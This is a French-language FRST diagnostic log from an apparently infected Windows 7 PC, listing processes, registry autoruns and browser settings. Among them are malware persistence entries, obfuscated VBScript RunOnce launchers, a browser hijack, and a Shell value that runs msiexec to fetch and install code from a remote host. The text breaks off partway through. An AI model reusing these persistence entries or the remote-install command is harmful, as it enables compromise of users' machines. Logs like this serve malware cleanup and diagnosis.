Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x64) Version: 26-12-2017 Exécuté par BOB (administrateur) sur SWAGCOMPUTER9 (31-12-2017 10:41:03) Exécuté depuis C:\Users\BOB\Desktop Profils chargés: BOB & (Profils disponibles: BOB) Platform: Windows 7 Professional Service Pack 1 (X64) Langue: Français (France) Internet Explorer Version 11 (Navigateur par défaut: "C:\Program Files (x86)\Fanlook\Application\chrome.exe" "%1") Mode d'amorçage: Normal Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processus (Avec liste blanche) ================= (Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.) (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Corporation) C:\Windows\System32\rundll32.exe (Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe (Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (McAfee, Inc.) C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe (Elex do Brasil Participações Ltda) C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe (McAfee, Inc.) C:\Program Files\TrueKey\McTkSchedulerService.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (Microsoft Corporation) C:\Windows\System32\msiexec.exe (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\igfxsrvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe (Dell Inc.) C:\Program Files\Dell\DellDataVault\DDVRulesProcessor.exe (Dell) C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe (Microsoft Corporation) C:\Windows\ehome\mcupdate.exe (Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpService.exe (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe (Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Wondershare) C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (Microsoft Corporation) C:\Windows\SysWOW64\WerFault.exe (SoftThinks SAS) C:\Program Files (x86)\Dell Backup and Recovery\SftService.exe () C:\Windows\M-50505223570267092472746290450\winmgr.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Dell Inc.) C:\Program Files\Dell\DellDataVault\DDVDataCollector.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Dell Inc.) C:\Program Files\Dell\DellDataVault\DDVCollectorSvcApi.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe (Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe ==================== Registre (Avec liste blanche) =========================== (Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.) HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7194840 2013-07-27] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg_PushButton] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-07-29] (Realtek Semiconductor) HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1321688 2013-07-29] (Realtek Semiconductor) HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [286056 2013-07-30] (Intel Corporation) HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-26] (Intel Corporation) HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2137744 2016-10-08] (Wondershare) HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2384984 2016-12-09] (Adobe Systems Incorporated) HKLM-x32\...\Run: [Microsoft Windows Manager] => C:\Windows\M-50505223570267092472746290450\winmgr.exe [86016 2017-08-09] () HKLM-x32\...\Run: [syshost32] => C:\Windows\Installer\{E8E34052-3F7B-C307-7D78-8F685A841457}\syshost.exe [395776 2017-08-09] () HKLM-x32\...\Run: [Windows Security Manager] => C:\Users\BOB\AppData\Roaming\Win32\wsmcs.exe [0 2017-09-13] () HKLM-x32\...\RunOnce: [Rosanoleba] => C:\Windows\SysWOW64\wscript.exe /E:vbscript /B "C:\PROGRA~2\COMMON~1\789363~1\Hesulunagu.dat" HKLM-x32\...\RunOnce: [Bufagok] => C:\Windows\SysWOW64\wscript.exe /E:vbscript /B "C:\Users\BOB\AppData\Roaming\62F5E1~1\Nosemep.dat" HKLM-x32\...\RunOnce: [Hacebulaka] => C:\Windows\SysWOW64\wscript.exe /E:vbscript /B "C:\Users\BOB\AppData\Local\319EF9~1\Codafeno.dat" Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKLM\...\Policies\Explorer\Run: [Windows Security Manager] => C:\Users\BOB\AppData\Roaming\Win32\wsmcs.exe [0 2017-09-13] () HKLM\...\Policies\Explorer: [HideSCAHealth] 1 HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\...\Run: [Chromium] => c:\users\bob\appdata\local\chromium\application\chrome.exe --auto-launch-at-startup --profile-directory=Default --restore-last-session --restore-last-session --restore-last-session --restore-last-sess (l'élément de données a 26 caractères en plus). HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\...\Run: [Microsoft Windows Manager] => C:\Users\BOB\M-505074067204976070913757760\winmgr.exe [0 2017-09-13] () HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\...\Run: [svchost] => C:\Users\BOB\AppData\Local\Temp\6E3.tmp.exe [312320 2017-09-13] () <==== ATTENTION HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\...\Run: [MSConfig] => C:\Users\BOB\lhsmbwha.exe [0 2017-09-13] () HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\...\Run: [EA Core] => "C:\Program Files (x86)\Electronic Arts\EADM\Core.exe" -silent HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\...\RunOnce: [svchost] => C:\Users\BOB\AppData\Local\Temp\6E3.tmp.exe [312320 2017-09-13] () <==== ATTENTION HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\...\Policies\Explorer\Run: [Drivers] => C:\Users\BOB\AppData\Roaming\Microsoft\srvuwser\veucsubg.exe HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj81FkE1MdJXNUZLNdYcMUZWMWq4RWLLMWw8NUFdFTkyNq== /q <==== ATTENTION HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\...\Policies\Explorer: [TaskbarNoNotification] 1 HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\...\Policies\Explorer: [HideSCAHealth] 1 HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\...\MountPoints2: G - G:\setup.exe HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\...\MountPoints2: {3c59b05c-88a1-11e6-b556-f3af40a3cbc3} - F:\LaunchU3.exe -a HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\...\Run: [Chromium] => c:\users\bob\appdata\local\chromium\application\chrome.exe --auto-launch-at-startup --profile-directory=Default --restore-last-session --restore-last-session --restore-last-session --restore-last-sess (l'élément de données a 26 caractères en plus). HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\...\Run: [Microsoft Windows Manager] => C:\Users\BOB\M-505074067204976070913757760\winmgr.exe [0 2017-09-13] () HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\...\Run: [svchost] => C:\Users\BOB\AppData\Local\Temp\6E3.tmp.exe [312320 2017-09-13] () <==== ATTENTION HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\...\Run: [MSConfig] => C:\Users\BOB\lhsmbwha.exe [0 2017-09-13] () HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\...\Run: [EA Core] => "C:\Program Files (x86)\Electronic Arts\EADM\Core.exe" -silent HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\...\RunOnce: [svchost] => C:\Users\BOB\AppData\Local\Temp\6E3.tmp.exe [312320 2017-09-13] () <==== ATTENTION HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\...\Policies\Explorer\Run: [Drivers] => C:\Users\BOB\AppData\Roaming\Microsoft\srvuwser\veucsubg.exe HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj81FkE1MdJXNUZLNdYcMUZWMWq4RWLLMWw8NUFdFTkyNq== /q <==== ATTENTION HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\...\Policies\Explorer: [TaskbarNoNotification] 1 HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\...\Policies\Explorer: [HideSCAHealth] 1 HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\...\MountPoints2: G - G:\setup.exe HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\...\MountPoints2: {3c59b05c-88a1-11e6-b556-f3af40a3cbc3} - F:\LaunchU3.exe -a Lsa: [Notification Packages] scecli C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter ShellExecuteHooks: Pas de nom - {7AE915BA-F77B-11E6-9977-64006A5CFC23} - C:\Program Files (x86)\Mehition\Atoosekheght.dll [147456 2017-03-02] () ShellExecuteHooks: Pas de nom - {64372564-12F4-11E7-9E37-64006A5CFC23} - C:\Users\BOB\AppData\Roaming\Lufphhkage\Ghijercultchosey.dll -> Pas de fichier <==== ATTENTION Startup: C:\Users\BOB\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explorer.lnk [2017-09-13] ShortcutTarget: Explorer.lnk -> (Pas de fichier) GroupPolicy: Restriction <==== ATTENTION CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION ==================== Internet (Avec liste blanche) ==================== (Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.) ProxyServer: [S-1-5-21-4197031219-1917498957-2016370213-1000] => 127.0.0.1:8080 ProxyServer: [S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926] => 127.0.0.1:8080 Tcpip\Parameters: [DhcpNameServer] 192.168.0.254 Tcpip\..\Interfaces\{0A3C9A52-E512-458C-9E8C-E4EBDCD6D9AE}: [DhcpNameServer] 192.168.0.254 Internet Explorer: ================== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493996593&z=0361d9ac3f228005b58c157gdz3tac5tft8q8wdtbe&from=che0812&uid=ST500DM002-1BD142_Z6EN4PT2XXXXZ6EN4PT2 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493996593&z=0361d9ac3f228005b58c157gdz3tac5tft8q8wdtbe&from=che0812&uid=ST500DM002-1BD142_Z6EN4PT2XXXXZ6EN4PT2 HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493996593&z=0361d9ac3f228005b58c157gdz3tac5tft8q8wdtbe&from=che0812&uid=ST500DM002-1BD142_Z6EN4PT2XXXXZ6EN4PT2 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493996593&z=0361d9ac3f228005b58c157gdz3tac5tft8q8wdtbe&from=che0812&uid=ST500DM002-1BD142_Z6EN4PT2XXXXZ6EN4PT2 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://google.com HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493996593&z=0361d9ac3f228005b58c157gdz3tac5tft8q8wdtbe&from=che0812&uid=ST500DM002-1BD142_Z6EN4PT2XXXXZ6EN4PT2 HKU\S-1-5-21-4197031219-1917498957-2016370213-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493996593&z=0361d9ac3f228005b58c157gdz3tac5tft8q8wdtbe&from=che0812&uid=ST500DM002-1BD142_Z6EN4PT2XXXXZ6EN4PT2 HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493996593&z=0361d9ac3f228005b58c157gdz3tac5tft8q8wdtbe&from=che0812&uid=ST500DM002-1BD142_Z6EN4PT2XXXXZ6EN4PT2 HKU\S-1-5-21-4197031219-1917498957-2016370213-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12312017103548926\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493996593&z=0361d9ac3f228005b58c157gdz3tac5tft8q8wdtbe&from=che0812&uid=ST500DM002-1BD142_Z6EN4PT2XXXXZ6EN4PT2 SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-60b342da&q={searchTerms} SearchScopes: HKLM -> {26080cad-4adc-49ac-8c63-eda16e595cbd} URL = SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM -> {EBB339DC-1EBA-4780-86FD-E7F0777E7421} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dmontlsfs_17_16¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1QzuyCyEtDtDyC0AtBtB0B0FyCyB0B0DtCyCtN0D0Tzu0StCzytAyEtN1L2XzutAtFtBzytFtAtFyDtBtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyDtDyEyE0AtB0F0AtGtBzz0A0AtGyCyEyDtAtGyEyCzy0CtGtByCyCtCtByB0EyByEyB0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCzztAyDyCtBtA0FtGtDtC0FtCtGyEyCyBtDtGzzyBtAtDtG0AyE0DtC0D0AtCtB0F0CyEtB2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtByCzztA%26cr%3D1483230843%26a%3Dwbf_dmontlsfs_17_16%26os_ver%3D6.1%26os%3DWindows%2B7%2BProfessional&p={searchTerms} SearchScopes: HKLM -> {f79e5d1c-5148-469e-9f98-a11d8d7863f4} URL = SearchScopes: HKLM -> {f7bb050c-e116-44da-89c2-6f2b68c54836} URL = SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {2211d4a5-48d0-47f5-a7cd-81e861470f7f} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-60b342da&q={searchTerms} SearchScopes: HKLM-x32 -> {26080cad-4adc-49ac-8c63-eda16e595cbd} URL = SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> 